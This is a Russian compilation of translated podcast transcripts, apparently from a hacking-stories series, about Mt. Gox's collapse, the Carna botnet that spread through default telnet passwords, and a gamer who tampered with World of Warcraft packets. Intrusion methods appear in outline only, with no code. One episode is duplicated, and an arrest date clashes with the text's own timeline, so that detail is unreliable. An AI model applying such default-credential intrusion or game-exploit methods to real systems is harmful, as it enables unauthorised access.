Ведущий: Анализируя журналы и суммируя сделки, этот бот привел к тому, что Марк потерял дополнительно 50 миллионов долларов и 22 000 биткоинов. В феврале 2014 года Mt. Gox внезапно, без предупреждения, прекратила все выплаты со своего сайта. Марк заявил, что они решают некоторые проблемы безопасности, но несколько недель спустя Mt. Gox, крупнейшая биткойн-биржа на рынке, полностью закрылась. Веб-сайт отключился и просто показывал пустую страницу. Протесты начались у здания токийского офиса. Тысячи клиентов были в ярости. Mt. Gox закрыл свои двери, казалось бы, удерживая 850 000 биткоинов, но на самом деле казна Mt. Gox была совершенно пуста. В конце февраля Mt. Gox подала заявление о банкротстве в Токио, заявив, что они потеряли 850 000 биткоинов на сумму 470 миллионов долларов. Никто не верил, что Марк потерял так много Биткоинов. Это семь процентов всех биткоинов в мире.

Люди просто не могли понять, как такое большое количество биткоинов могло быть потеряно. Но, как вы слышали, они были потеряны, просто не сразу. В следующем месяце, просматривая некоторые старые системы Mt. Gox, которые использовались в 2011 году, Марк Карпелес обнаружил в системе кошелек, в котором все еще было 200 000 биткоинов. Это привело к тому, что общие потери снизились до 650 000 биткоинов. В августе 2013 года токийская полиция арестовала Марка Карпелеса. Не за потерю 650 000 биткоинов, а по обвинению в растрате и мошенничестве. Японские прокуроры обвинили его в том, что он ложно добавил биткоины на счета инвесторов, а затем перевел их на свой собственный кошелек. Он продолжал заявлять о своей невиновности по этим обвинениям.

Что касается воров, которые украли деньги с Mt. Gox, то только один человек был пойман и арестован. Его зовут Алекс Винник, он гражданин России и был арестован в Греции. Он был арестован за отмывание денег, но доказательства показывают, что у него было несколько биткоинов, которые были украдены с Mt. Gox. Однако только потому, что они у него были, это не значит, что он их украл. Его просто обвинили в отмывании денег, а не в краже биткоина. Через год после ареста Марк Карпелес был освобожден под залог и в настоящее время проживает в Токио. Он все еще проходит судебный процесс по своему аресту в связи с банкротством Mt. Gox.

Те 200 000 биткоинов, которые он нашел, остались нетронутыми с тех пор, как он их нашел. Дело о банкротстве запрещает ему прикасаться к ним, но с 2014 года, когда Mt. Gox подала заявление о банкротстве, цена биткоина взлетела до небес.Mt. Gox задолжал своим кредиторам 450 миллионов долларов на тот момент, сейчас на его кошельке с 200 000 биткоинов лежит космическая сумма.

Ким: Несомненно, индустрия и сообщество многому научились после Mt. Gox. Как я уже сказал, большая часть неудач, заключалась в том, что Mt. Gox была первой в своем роде. В 2011 году не было никаких реальных передовых практик или чего-то подобного, и, как может сказать вам любой, кто был в любом изначально успешном стартапе, может быть очень трудно идти в ногу с фактическим инвестированием времени, необходимого для поддержания вашей технологии в актуальном состоянии.

Ведущий: Одна важная вещь, которую мы узнали от Mt. Gox, заключается в том, что оставлять свой биткоин на бирже не очень хорошая идея, если вы на самом деле им не торгуете. Для долгосрочного хранения лучше всего хранить биткоин-кошелек на вашем собственном компьютере, который вы контролируете. Таким образом, он не может быть украден с биржи, но вам все равно нужно быть осторожным, защищая свой компьютер от воров. Также хорошо использовать биржу с хорошей репутацией, а не то, что появилось только вчера. Из Mt. Gox можно извлечь много уроков.

https://telegra.ph/EHpizod-11-Istori...pto-vojn-04-12

Эпизод 13: Великая перепись Интернета

Вступить в наш чат


В 2012 году был создан и запущен в мир ботнет Carna. Но у него не было никаких намерений делать что-то злонамеренное. Он был создан только для того, чтобы помочь всем нам лучше понять Интернет. Этот ботнет использовал самую старую уязвимость в системе безопасности.

Ботнет Carna использовался для сканирования Интернета с целью создания карты расположения всех общедоступных компьютеров в мире. Чем это всё обернулось, читайте дальше.

https://i.gyazo.com/c6ca271774d784e81d0c1fb9d2abcfa2.png

Ведущий: Существует большой список всех известных уязвимостей в системе безопасности компьютеров. Вы хотите знать, какая самая известная компьютерная уязвимость? Это слабые пароли по умолчанию. Эта уязвимость известна с 1969 года. В частности, компьютеры иногда имеют имя пользователя admin с паролем также admin. Тогда компьютер не попросит вас изменить его, когда вы его покупаете, так что он может оставаться таким в течение длительного времени, порой даже несколько десятков лет. На протяжении многих лет многие хакеры смогли проникнуть во многие системы, используя это базовое имя пользователя и пароль. Прошло уже пятьдесят лет с тех пор, как мы узнали об этой слабости системы безопасности. Наверняка к настоящему времени эта слабость уже устранена, верно? В мире больше нет компьютеров с таким именем пользователя и паролем, верно? Верно? Эх...

Джек: В 2012 году исследователи безопасности начали сканировать Интернет, чтобы узнать, на каких компьютерах все еще работает Telnet. Telnet - это способ удаленного входа в компьютер, но он не имеет шифрования, логин и пароль мог увидеть любой пользователь в Интернете.

В Интернете насчитывается почти четыре миллиарда IP-адресов, поэтому сканирование всего этого представляет большую проблему. Если бы они сканировали десять IP-адресов в секунду, им потребовалось бы десять лет, чтобы завершить сканирование. Исследователь подумал, что если бы у них было два сканера, это работало бы в два раза быстрее, а сто сканеров работали бы в сто раз быстрее. Поскольку исследователь находил все эти системы в Интернете, в которые он мог войти как администратор, то почему бы не запустить эти системы, чтобы помочь сканировать Интернет? Исследователь создал программу, которая сканировала и находила незащищенные системы, а затем загружала ту же самую программу в найденные системы, а затем запускала эту систему для сканирования других систем. Они создавали ботнет. Ботнет - это программа, запущенная на многих компьютерах, которые работают вместе для выполнения одной и той же задачи, но создатель ботнета не имеет разрешения на использование ни одного из этих компьютеров. На самом деле просто войти на один компьютер в качестве администратора, которым они не владели, было незаконно. Конечно, было очень незаконно делать это с тысячами компьютеров.

Исследователь знал, что это незаконно, и должен был оставаться анонимным, чтобы его не поймали. На следующий день ботнет распространился на 30 000 компьютеров и даже не приблизился к завершению полного сканирования. После некоторых настроек, дополнительных тестов и сканирований ботнет завершил сканирование Интернета в поисках всех устройств, работающих под управлением Telnet, у которых были эти пароли по умолчанию. Ботнет обнаружил 1,2 миллиона подобных устройств. Многие из этих уязвимых устройств даже не должны быть в Интернете. Это были телевизоры и промышленные системы управления, камеры, разбрызгиватели воды. Из этих 1,2 миллиона уязвимых устройств ботнет был установлен на 420 000 хостах.

Но это создает новую проблему: хранение такого количества результатов сканирования создает серьезную проблему с логистикой. Мы говорим о возможности получать более миллиона данных в секунду. Исследователь создал веб-приложение с использованием Python и PHP и использовал dupe в качестве базы данных. На данный момент ботнет был полностью собран и готов к проведению полного сканирования Интернета. Исследователь посмотрел на это творение и решил назвать его ботнетом Carna. Пока исследователи настраивали ботнет, они заметили нечто странное. Они обнаружили, что кто-то еще также создает ботнет и использует точно такие же уязвимости. Они обнаружили этот другой ботнет на тех же компьютерах, на которых был установлен ботнет Carna. Он был известен как ботнет Aidra. Но у ботнета Aidra был злой умысел.

Он использовался для уничтожения компьютеров и делал плохие вещи. Исследователю удалось обнаружить, что Aidra заразила более 30 000 тех же компьютеров, что и ботнет Carna. Находясь в этом уникальном положении, исследователь решил заблокировать ботнет Aidra от доступа к устройствам. Они смогли удалить Aidra из системы и заблокировать этот IP-адрес, чтобы Aidra не возвращалась. Так что из-за этого Aidra начала терять множество узлов. Меня завораживает мысль об этих двух ботнетах в мире, сражающихся друг с другом. После того, как ботнет Carna был создан и были проведены дополнительные тесты, пришло время провести полное сканирование. Исследователь дал команду всем 420 000 системам просканировать весь Интернет, и это сработало. Все общедоступные IP-адреса в мире были отсканированы, и по результатам были собраны данные, но исследователю этого было недостаточно. После создания этого огромного ботнета и невероятной инфраструктуры для его поддержки одного сканирования было недостаточно.

Они решили провести сканирование во второй раз, и в третий, и в четвертый. На самом деле они продолжали сканировать весь Интернет снова и снова, неделя за неделей, месяц за месяцем. Потому что час за часом и день за днем Интернет меняется. Таким образом, проведение многочисленных сканирований всего Интернета было бы единственным способом точно понять, что там есть. После шести недель непрерывного сканирования Интернета и сбора всех данных исследователь отключил ботнет. Все программы, которые были на зараженных хостах, незаметно удалились сами, и все системы были возвращены в то состояние, в котором они были до установки ботнета. Это конец истории для ботнета Carna.

Теперь начинается история интернет-переписи. Теперь пришло время исследователю просмотреть все эти данные и попытаться разобраться в них. Исследователь назвал этот проект Интернет-переписью 2012 года.

Что за жуткие подробности узнали хакеры, узнаем в следующей части.

Эпизод 14: Что скрывает Интернет

Вступить в наш чат

В 2012 году был создан и запущен в мир ботнет Carna. Но у него не было никаких намерений делать что-то злонамеренное. Он был создан только для того, чтобы помочь всем нам лучше понять Интернет. Этот ботнет использовал самую старую уязвимость в системе безопасности.

Ботнет Carna использовался для сканирования Интернета с целью создания карты расположения всех общедоступных компьютеров в мире. Чем это всё обернулось, читайте дальше.

https://i.gyazo.com/07e9ebf66fabafaf4910ebc154211199.png

Все эти данные, которые есть в базе данных, интересны, но читать их скучно. Тогда разным регионам мира был присвоен диапазон IP-адресов. Африка получает один блок, США - другой, и так далее. Но еще более конкретным штатам и городам также присваиваются диапазоны IP-адресов. Исследователь начал добавлять географические местоположения ко всем собранным им данным. Поиск GeoIP был выполнен по каждому IP-адресу, чтобы определить, где находится этот компьютер в мире. В конце концов данные начали рассказывать историю. Данные показывали, какие IP-адреса были подключены к Сети и где они находились. Исследователь собрал все эти данные о местоположении и разместил их на карте мира. Это дало удивительные результаты.

Исследователь безопасности собрал все данные и анонимно опубликовал их на всеобщее обозрение. Это включало в себя множество подробностей о том, как был создан ботнет Carna, а также о том, как были собраны все данные, и, конечно же, карту всех компьютеров в мире. На карте вы увидите много точек. На карте есть точка для каждого компьютера в местоположении, которое было в базе данных. Там миллиарды точек.

Все, кому я показывал эту карту, восхищались великолепием данных, на которые они смотрели. Некоторые люди заметили, что Лос-Анджелес выходит в сеть примерно в то же время, что и Нью-Йорк. Некоторые люди замечают, что в Северной Корее совершенно темно, а другие люди видели, что Канада, Россия и северные районы были темными, за исключением Скандинавии. Поскольку исследователь безопасности создал такую красивую карту для отображения собранных данных, эта карта стала вирусной и распространилась по всему миру.

Все были удивлены, насколько велик Интернет. Это первая карта Интернета, и она поразила всех нас. Сейчас, спустя полтора десятилетия, я все еще вижу, как эта карта время от времени появляется в моих социальных сетях, когда кто-то новый открывает ее и падает в обморок от красоты. Большинство людей видят эту карту и понятия не имеют, что потребовалось для ее создания.

Создатель этого ботнета оставался анонимным. Это связано с тем, что, несмотря на то, что у ботнета Carna были благие намерения, он все равно был незаконным, поскольку загружал и запускал программы на машинах, которые не принадлежали исследователю. Создатель ботнета должен был оставаться скрытым и анонимным после публикации данных. Эта история, вероятно, закончилась бы прямо здесь, если бы не один человек.

ПАРТ: Меня зовут Парт Шукла. В настоящее время я работаю инженером по безопасности в Google здесь, в Швейцарии. Раньше, до Google, я работал в AusCERT, австралийской группе реагирования на компьютерные чрезвычайные ситуации, базирующейся в Брисбене, Австралия. Когда я впервые прочитал об этом, я только начал работать в AusCERT. Это был мой первый месяц. Это моя первая работа в области ИТ-безопасности. В то время я все еще учился. Но меня сразу заинтересовала карта Интернета.

Итак, я нашел электронное письмо, которое, по-моему, уже было на странице GitHub, и отправил возможному создателю карты зашифрованное электронное письмо со словами: "Можете ли вы предоставить нам скомпрометированные IP-адреса, которые вы использовали для сканирования ботнета только для Австралии?" Я получил ответ, в котором говорилось, что на самом деле я первый человек, который связался с ним. Так всё и началось.

Ведущий: Когда Парт прочитал о ботнете Carna, ему бросилась в глаза одна вещь. Те 1,2 миллиона систем, которые были в Интернете, запускали Telnet и использовали пароли по умолчанию. Он думал, что не должно быть никаких причин для появления такого количества незащищенных устройств. Он хотел глубже разобраться в этой проблеме. Когда он попросил создателя ботнета указать только уязвимые устройства в Австралии, исследователь дал Парту полный список всех 1,2 миллионов уязвимых устройств.

ПАРТ: Сами данные составляли около 882 МБ. Это был большой текстовый файл с вкладками, и в основном он содержал MAC-адреса, производителей, оперативную память, имя хоста, информацию о процессоре, IP-адреса, коды стран всех устройств. Примерно 1,2 - 1,3 миллиона.

Ведущий: Когда Парт начал понимать, насколько уязвим Интернет, он решил что-то с этим сделать.

ПАРТ: Я действительно связался с IEEE.

Ведущий: IEEE - это организация, которая создает стандарты для электронных компонентов. Они являются авторитетной фигурой, для которой производитель может использовать тот или иной MAC-адрес. MAC-адрес - это локальное обозначение, назначенное каждому сетевому интерфейсу на каждом устройстве в мире. У Парта был список из 1,2 миллиона MAC-адресов как часть данных, которые он получил от создателя ботнета.

ПАРТ: Я пошел в IEEE, но они не захотели сотрудничать.

Ведущий: С помощью данных, собранных Партом из ботнета Carna, он поставил перед собой задачу попытаться решить эту проблему уязвимости Интернета. Он думал, что, связавшись с сертификатами в других странах, он мог бы помочь очистить уязвимые устройства там. Связавшись с производителями устройств, он мог бы помешать им создавать уязвимые устройства, но, похоже, не очень много сертификатов или производителей были заинтересованы в том, чтобы помочь решить проблему. Парту было трудно заставить организации обратить внимание на эту проблему. Но были некоторые люди, которые обращали внимание на эти данные. Хакеры со злым умыслом увидели, как был создан ботнет Carna, и начали создавать свои собственные ботнеты, используя точно такие же методы.

ПАРТ: Их было несколько – и я уверен, что прямо сейчас их работают сотни. Инструмент под названием Lightaidra использовал точно такую же уязвимость. Я думаю, что он был выпущен параллельно, чуть раньше, до того, как были опубликованы данные ботнета Carna.

Ведущий: В сообществе безопасности

было несколько человек, которые осудили данные, поступившие из ботнета Carna, заявив, что, поскольку данные были получены незаконно, мы не должны использовать их для каких-либо законных исследований.

ПАРТ: Я согласен, что это незаконный ботнет. Я никак не могу не согласиться с этим утверждением. Что касается использования данных, я полагаю, очевидно, что моя позиция была ясна, поскольку вы можете видеть, как я их использовал. На самом деле у меня не было никаких серьезных этических сомнений по этому поводу, но, на мой взгляд, причина, по которой я думаю, что исследователь даже потрудился предоставить нам эти данные, заключается в том, что он также хотел устранить эту проблему. Это очень ясно видно по многочисленным электронным письмам. Я отправил ему довольно много вопросов, и он продолжал отвечать на них. Когда я делал свою первую презентацию на конференции AusCERT, я отправил ему слайды, и он ответил, что доволен таким результатом.

Ведущий: По сей день создатель остается анонимным, но есть ли у вас какие-нибудь мысли о том, кто бы это мог быть?

ПАРТ: В то время, в 2012 году, хранение девяти терабайт данных было недешевым. Он должен был сохранить его, и ему пришлось сжать его с помощью ZPAQ, что невероятно дорого для процессора.

Эта декомпрессия заняла у меня целый день на высокопроизводительном вычислительном кластере с тремя сотнями процессоров. По моему разумению, я просто подумал, что у кого бы это ни было, очевидно, много денег, потому что утверждалось, что он сделал это на кластере Amazon.

Ведущий: Почему вы перестали работать с этими данными?

ПАРТ: Это битва, в которой, казалось, мы должны были победить, но я не добился никакого прогресса. Теперь мое внимание лично сместилось в сторону сосредоточения на проблемах, которые я могу решить. Всякий раз, когда необходимы подобные воздействия в масштабах всей отрасли, вы действительно должны предложить решение на уровне спецификации. Например, MAC-адреса контролируются IEEE. Если бы IEEE дал какой-то мандат на что-то, то эти производители были бы вынуждены следовать ему. В настоящее время IEEE не занимается выдачей мандатов в области безопасности.

Одна из причин, по которой я перестал много работать над этим, я ушел из AusCERT, это, во-первых, но я также не потратил сколько-нибудь значительного времени на это, потому что я думаю, что это тупик. Попытка привлечь внимание производителя через публичное лицо - это кошмар, потому что для производителей больше всего важно поддерживать хорошую репутацию. Если вы так нападаете на них, то они будут защищаться.

Им пришлось оставить учетные записи по умолчанию открытыми на случай, если устройство было настроено неправильно, чтобы служба поддержки могла удаленно дозвониться и убедиться, что все работает правильно для непрофессионала. Есть все эти требования, которые предъявляются к этим инженерам. Они делают все возможное, чтобы донести их, и иногда у них нет опыта работы в сфере безопасности, и они не обучены тому, чтобы знать об этих проблемах безопасности.

Нужно думать о своей безопасности, а также о безопасности ваших близких. Это те уроки, которые я усвоил. Для меня это был жестокий вход в индустрию безопасности. Это первое, что я сделал на этой работе. Я старался изо всех сил, но пришло время перейти к чему-то не такому душераздирающему.

Ниже можно ознакомиться с исследованием Парта:

Скомпрометированные устройства ботнета Carna

Эпизод 15: Чем обернулся взлом игры

Вступить в наш чат

Ведущий: В 2002 году мне запретили играть в EverQuest. Это была массовая многопользовательская ролевая онлайн-игра, или MMORPG. Я провел годы, играя в игру. Это поглотило мою жизнь, но у меня были приключения, которые я никогда не забуду, например, когда я собрался с восемьюдесятью другими игроками и убивал драконов. Но после многих лет выполнения одних и тех же повторяющихся действий снова и снова мне стало скучно, и я перестал играть. Но это длилось недолго, потому что через несколько недель я снова начал играть. Я потратил годы, работая над своим персонажем, и было слишком трудно отпустить его. Я дошел до того, что просто не мог выйти из игры, поэтому единственным решением, которое я мог придумать, чтобы заставить меня выйти, было найти способ получить бан. Так я начал использовать бота.

https://i.gyazo.com/d3e7df44a600ec7ec985d4acba37b4a2.png

Бот брал под контроль моего персонажа и автоматизировал его для меня. Это было строго против правил игры. Я оставлял бота работать всю ночь, сражаясь с монстрами и набираясь опыта, пока я спал. Когда я проснулся, я был удивлен, увидев, что я все еще сражаюсь с монстрами, все еще не забаненный. Я продолжал создавать ботов и запускал их ночь за ночью. В конце концов, игроки пожаловались Game Master, что-то вроде админа игры, и я получил именно то, что хотел — бан. Хотя эта история кажется мне эпичной в моих собственных воспоминаниях, она ничто по сравнению с историей, которую вы сейчас услышите. Сейчас вы услышите, пожалуй, самую эпическую историю онлайн-видеоигр всех времен. Эта история настолько безумна, что ее даже опубликовали в журнале Wired. Так что соберитесь и послушайте легенду невероятных масштабов.

Мне очень повезло, что я запечатлел эту историю. Это редкость, которую можно услышать. Это история от парня по имени Манфред.

МАНФРЕД: Привет. Эй, как дела?

Ведущий:Манфред скрывал свою историю двадцать лет. Он никогда публично не рассказывал эти истории до этого года. Впервые он рассказал об этом на Defcon, крупнейшей хакерской конференции в мире, но сказал не все, что хотел.

МАНФРЕД: Я собирался показать два эксплойта нулевого дня в паре игр. Я был в Зеленой комнате на Defcon примерно за пятнадцать минут до выступления. Один из членов команды Defcon, спросил меня, о чем мой рассказ, и начал тему демонстрации этого эксплойта.

Ведущий:Он рассказал о многочисленных играх, которые он взломал. Это выступление на Defcon было записано и размещено на YouTube.

МАНФРЕД: Мое выступление на Defcon было удалено из-за жалобы на нарушение авторских прав компанией ArenaNet, создателями Guild Wars 2.

Ведущий: Как видите, история не только редкая, но и в некотором роде запретная. Итак, начнем, ладно? Во-первых, что за имя Манфред?

МАНФРЕД:В ранние дни Ultima Online я много играл в ПК, гриферил и все такое прочее. Изначально меня звали не Манфред. Это был Факчоп. P-H-U-C-K-C-H-O-P. Я предполагаю, что это как бы добавляло оскорблений к травмам игроков, которых я убивал. Всем весело, знаете ли. Это не я в реальной жизни. Это была просто игра. Я все это делал в свое удовольствие. Под этим именем Phuckchop я убивал игроков, в течение недель, а может быть, и месяцев. Затем однажды я просто сидел AFK в городе под охраной рядом с внутриигровым банком. Потом я пошел за пончиками Krispy Kreme на обед. Это был мой обычный обед. Я получаю дюжину таких. Они очень классные. Я вернулся и посмотрел на своего персонажа, и меня звали Манфред. Я подумал, хм, это интересно. Я просмотрел журнал чата и увидел, что админ сказал мне, что он не может позволить мне убивать игроков, играя за Phuckchop. Он такой: "Вы можете убивать игроков или что-то в этом роде, это часть игры, но у нас не может быть такого имени", поэтому он просто изменил мое имя на случайное, и им оказался Манфред.

Ведущий: Эта история произошла двадцать лет назад. С тех пор Манфред играет в MMORPG. Все всегда начинается одинаково: он будет играть, развлекаться, изучать игру вдоль и поперек, а потом в конце концов надоест и начнет возиться с ней.

МАНФРЕД: Ради забавы я занимаюсь реинжинирингом игр и реинжинирингом того, как протокол общается с сервером и наоборот, как сервер общается с клиентом.

Ведущий:Он взламывает онлайн-видеоигры. Это то, в чем он хорош. После двадцати лет работы он стал экспертом по поиску ошибок в ММО. Он перехватывает пакеты и анализирует, что в них. Он вставит свои данные в пакеты и посмотрит, как на это отреагирует игра.

МАНФРЕД:Все игры можно взломать. Ultima Online, Dark Age of Camelot, Anarchy Online, Lineage II, Final Fantasy Online, первая, World of Warcraft, RIFT Online, Elder Scrolls Online, Lord of the Rings Online, RIFT Online II, Final Fantasy XIV, Гильдия Войны II и WildStar Online. Я уверен, что забыл еще пять или шесть.

Ведущий: Поскольку лично я много играл в World of Warcraft, давайте начнем с этого. World of Warcraft лидировала как самая популярная MMORPG в 2007 году.

МАНФРЕД: Когда я играл в нее, думаю, в ней было около десяти миллионов игроков.

Ведущий: Манфред играл некоторое время, и ему было весело повышать уровень своих персонажей, сражаться с существами и исследовать мир. В этой игре была такая вещь, как система талантов, и за каждый уровень, который вы повышаете, вы получаете одно очко таланта, которое можно вложить в улучшение своего персонажа. Манфреду стало любопытно, какие пакеты компьютер отправляет на сервер, когда он будет использовать очко талантов, но возникла проблема. Пакеты между его компьютером и сервером были зашифрованы, поэтому он не мог видеть, что внутри них, или вводить в них свои данные. Но он занимается реверс-инжинирингом, поэтому начинает возиться с…

МАНФРЕД: Немного модифицирую игровой клиент, чтобы я мог перехватить связь до того, как произойдет шифрование, когда пакеты отправляются.

Ведущий: Он потратил очко таланта, чтобы прокачать своего персонажа. Он видел, как выглядят данные, когда это происходит. Он попытался воспроизвести тот же пакет обратно в игровой клиент. Он ожидал увидеть, что он потратил одно очко таланта, и его талант вырастет на единицу.

МАНФРЕД: Я заметил, что мои навыки не совпадают с потраченными очками талантов. Произошло отключение. Предположим, у меня было, например, около пятнадцати очков навыков в одном дереве навыков, но я не использовал ни одного из своих очков талантов, что было странно. Почему-то, по крайней мере, сначала я думал, что это просто глюк на стороне клиента, когда я повышаю свои таланты, не используя очки навыков. Я вышел из игры, закрыл клиент и загрузил с сервера свежую копию своего персонажа, которая рассказала мне истинную историю происходящего. Я захожу в игру, и у меня все еще есть пятнадцать очков в моем дереве талантов, и у меня все еще есть мои пятнадцать очков умений. Я подумал, ладно, это интересно. Давайте посмотрим, что здесь происходит.

Ведущий: Очки талантов редки, и вы можете получить только определенное количество. Вы можете потратить максимум пять на определенный навык, но Манфред нашел способ тратить очки талантов, которых у него не было.

МАНФРЕД: Любые таланты, которые улучшали силу вашего персонажа, были довольно значительными, потому что вы получаете преимущество, несправедливое преимущество, по сути, над десятью миллионами игроков.

Ведущий: После того, как Манфред прокачал таланты взломом, он стал богоподобным в игре. Его силы были намного выше, чем у любого другого игрока.

МАНФРЕД: Потом я пошел посмотреть, смогу ли я пройти подземелье в одиночку.

Ведущий: Он мог легко зачищать подземелья, для прохождения которых обычно требуется пять человек, что позволило ему собрать лучшее снаряжение и улучшить персонажа ещё больше. Он продолжал использовать свои способности, чтобы увидеть, что можно сделать с этим супергероем. В какой-то момент его целью стал Molten Core. Это было подземелье рейдового уровня, для прохождения которого требовалось сорок человек. Он пытался соло.

МАНФРЕД: Мой персонаж не был достаточно силен, чтобы пройти Molten Core, поэтому мы начали собирать друзей. Я улучшал своих персонажей и персонажей моих друзей. Мы сделали это в 8 человек. Это было очень весело. Мы использовали этот эксплойт таланта, чтобы проходить подземелья с очень небольшим количеством людей, вероятно, от восьми до девяти месяцев.

Ведущий: Разработчики игры так и не обнаружили и не поймали Манфреда за этими взломами.

МАНФРЕД: У них есть метрики по всем этим подземельям, и они могли видеть, как быстро группа игроков может пройти подземелье или что-то еще, но они долгое время бездействовали. Я чувствовал себя подобным Богу.

Однако, взлома Манфреда не могли не иметь последствий. Насколько этот взлом безобидный? Как на это отреагировал закон? Продолжение в следующей части.

Эпизод 15: Чем обернулся взлом игры

Вступить в наш чат

Ведущий: В 2002 году мне запретили играть в EverQuest. Это была массовая многопользовательская ролевая онлайн-игра, или MMORPG. Я провел годы, играя в игру. Это поглотило мою жизнь, но у меня были приключения, которые я никогда не забуду, например, когда я собрался с восемьюдесятью другими игроками и убивал драконов. Но после многих лет выполнения одних и тех же повторяющихся действий снова и снова мне стало скучно, и я перестал играть. Но это длилось недолго, потому что через несколько недель я снова начал играть. Я потратил годы, работая над своим персонажем, и было слишком трудно отпустить его. Я дошел до того, что просто не мог выйти из игры, поэтому единственным решением, которое я мог придумать, чтобы заставить меня выйти, было найти способ получить бан. Так я начал использовать бота.

https://i.gyazo.com/d3e7df44a600ec7ec985d4acba37b4a2.png

Бот брал под контроль моего персонажа и автоматизировал его для меня. Это было строго против правил игры. Я оставлял бота работать всю ночь, сражаясь с монстрами и набираясь опыта, пока я спал. Когда я проснулся, я был удивлен, увидев, что я все еще сражаюсь с монстрами, все еще не забаненный. Я продолжал создавать ботов и запускал их ночь за ночью. В конце концов, игроки пожаловались Game Master, что-то вроде админа игры, и я получил именно то, что хотел — бан. Хотя эта история кажется мне эпичной в моих собственных воспоминаниях, она ничто по сравнению с историей, которую вы сейчас услышите. Сейчас вы услышите, пожалуй, самую эпическую историю онлайн-видеоигр всех времен. Эта история настолько безумна, что ее даже опубликовали в журнале Wired. Так что соберитесь и послушайте легенду невероятных масштабов.

Мне очень повезло, что я запечатлел эту историю. Это редкость, которую можно услышать. Это история от парня по имени Манфред.

МАНФРЕД: Привет. Эй, как дела?

Ведущий:Манфред скрывал свою историю двадцать лет. Он никогда публично не рассказывал эти истории до этого года. Впервые он рассказал об этом на Defcon, крупнейшей хакерской конференции в мире, но сказал не все, что хотел.

МАНФРЕД: Я собирался показать два эксплойта нулевого дня в паре игр. Я был в Зеленой комнате на Defcon примерно за пятнадцать минут до выступления. Один из членов команды Defcon, спросил меня, о чем мой рассказ, и начал тему демонстрации этого эксплойта.

Ведущий:Он рассказал о многочисленных играх, которые он взломал. Это выступление на Defcon было записано и размещено на YouTube.

МАНФРЕД: Мое выступление на Defcon было удалено из-за жалобы на нарушение авторских прав компанией ArenaNet, создателями Guild Wars 2.

Ведущий: Как видите, история не только редкая, но и в некотором роде запретная. Итак, начнем, ладно? Во-первых, что за имя Манфред?

МАНФРЕД:В ранние дни Ultima Online я много играл в ПК, гриферил и все такое прочее. Изначально меня звали не Манфред. Это был Факчоп. P-H-U-C-K-C-H-O-P. Я предполагаю, что это как бы добавляло оскорблений к травмам игроков, которых я убивал. Всем весело, знаете ли. Это не я в реальной жизни. Это была просто игра. Я все это делал в свое удовольствие. Под этим именем Phuckchop я убивал игроков, в течение недель, а может быть, и месяцев. Затем однажды я просто сидел AFK в городе под охраной рядом с внутриигровым банком. Потом я пошел за пончиками Krispy Kreme на обед. Это был мой обычный обед. Я получаю дюжину таких. Они очень классные. Я вернулся и посмотрел на своего персонажа, и меня звали Манфред. Я подумал, хм, это интересно. Я просмотрел журнал чата и увидел, что админ сказал мне, что он не может позволить мне убивать игроков, играя за Phuckchop. Он такой: "Вы можете убивать игроков или что-то в этом роде, это часть игры, но у нас не может быть такого имени", поэтому он просто изменил мое имя на случайное, и им оказался Манфред.

Ведущий: Эта история произошла двадцать лет назад. С тех пор Манфред играет в MMORPG. Все всегда начинается одинаково: он будет играть, развлекаться, изучать игру вдоль и поперек, а потом в конце концов надоест и начнет возиться с ней.

МАНФРЕД: Ради забавы я занимаюсь реинжинирингом игр и реинжинирингом того, как протокол общается с сервером и наоборот, как сервер общается с клиентом.

Ведущий:Он взламывает онлайн-видеоигры. Это то, в чем он хорош. После двадцати лет работы он стал экспертом по поиску ошибок в ММО. Он перехватывает пакеты и анализирует, что в них. Он вставит свои данные в пакеты и посмотрит, как на это отреагирует игра.

МАНФРЕД:Все игры можно взломать. Ultima Online, Dark Age of Camelot, Anarchy Online, Lineage II, Final Fantasy Online, первая, World of Warcraft, RIFT Online, Elder Scrolls Online, Lord of the Rings Online, RIFT Online II, Final Fantasy XIV, Гильдия Войны II и WildStar Online. Я уверен, что забыл еще пять или шесть.

Ведущий: Поскольку лично я много играл в World of Warcraft, давайте начнем с этого. World of Warcraft лидировала как самая популярная MMORPG в 2007 году.

МАНФРЕД: Когда я играл в нее, думаю, в ней было около десяти миллионов игроков.

Ведущий: Манфред играл некоторое время, и ему было весело повышать уровень своих персонажей, сражаться с существами и исследовать мир. В этой игре была такая вещь, как система талантов, и за каждый уровень, который вы повышаете, вы получаете одно очко таланта, которое можно вложить в улучшение своего персонажа. Манфреду стало любопытно, какие пакеты компьютер отправляет на сервер, когда он будет использовать очко талантов, но возникла проблема. Пакеты между его компьютером и сервером были зашифрованы, поэтому он не мог видеть, что внутри них, или вводить в них свои данные. Но он занимается реверс-инжинирингом, поэтому начинает возиться с…

МАНФРЕД: Немного модифицирую игровой клиент, чтобы я мог перехватить связь до того, как произойдет шифрование, когда пакеты отправляются.

Ведущий: Он потратил очко таланта, чтобы прокачать своего персонажа. Он видел, как выглядят данные, когда это происходит. Он попытался воспроизвести тот же пакет обратно в игровой клиент. Он ожидал увидеть, что он потратил одно очко таланта, и его талант вырастет на единицу.

МАНФРЕД: Я заметил, что мои навыки не совпадают с потраченными очками талантов. Произошло отключение. Предположим, у меня было, например, около пятнадцати очков навыков в одном дереве навыков, но я не использовал ни одного из своих очков талантов, что было странно. Почему-то, по крайней мере, сначала я думал, что это просто глюк на стороне клиента, когда я повышаю свои таланты, не используя очки навыков. Я вышел из игры, закрыл клиент и загрузил с сервера свежую копию своего персонажа, которая рассказала мне истинную историю происходящего. Я захожу в игру, и у меня все еще есть пятнадцать очков в моем дереве талантов, и у меня все еще есть мои пятнадцать очков умений. Я подумал, ладно, это интересно. Давайте посмотрим, что здесь происходит.

Ведущий: Очки талантов редки, и вы можете получить только определенное количество. Вы можете потратить максимум пять на определенный навык, но Манфред нашел способ тратить очки талантов, которых у него не было.

МАНФРЕД: Любые таланты, которые улучшали силу вашего персонажа, были довольно значительными, потому что вы получаете преимущество, несправедливое преимущество, по сути, над десятью миллионами игроков.

Ведущий: После того, как Манфред прокачал таланты взломом, он стал богоподобным в игре. Его силы были намного выше, чем у любого другого игрока.

МАНФРЕД: Потом я пошел посмотреть, смогу ли я пройти подземелье в одиночку.

Ведущий: Он мог легко зачищать подземелья, для прохождения которых обычно требуется пять человек, что позволило ему собрать лучшее снаряжение и улучшить персонажа ещё больше. Он продолжал использовать свои способности, чтобы увидеть, что можно сделать с этим супергероем. В какой-то момент его целью стал Molten Core. Это было подземелье рейдового уровня, для прохождения которого требовалось сорок человек. Он пытался соло.

